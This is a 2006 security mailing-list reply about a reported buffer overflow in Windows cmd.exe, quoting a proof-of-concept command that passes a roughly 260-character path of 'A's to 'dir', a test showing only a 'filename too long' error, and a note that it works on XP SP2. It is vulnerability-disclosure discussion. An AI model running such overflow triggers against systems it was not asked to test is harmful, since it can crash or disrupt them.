YEah! Buffer Overflow Windows XP SP2

I Hill debug this.

Luís Alberto Cortes Zavala
IT / Security Consultant
napa@securitynation.com
http://www.securitynation.com



-----Mensaje original-----
De: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-dev@securityfocus.com
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow

> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)

Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K 
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long. 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/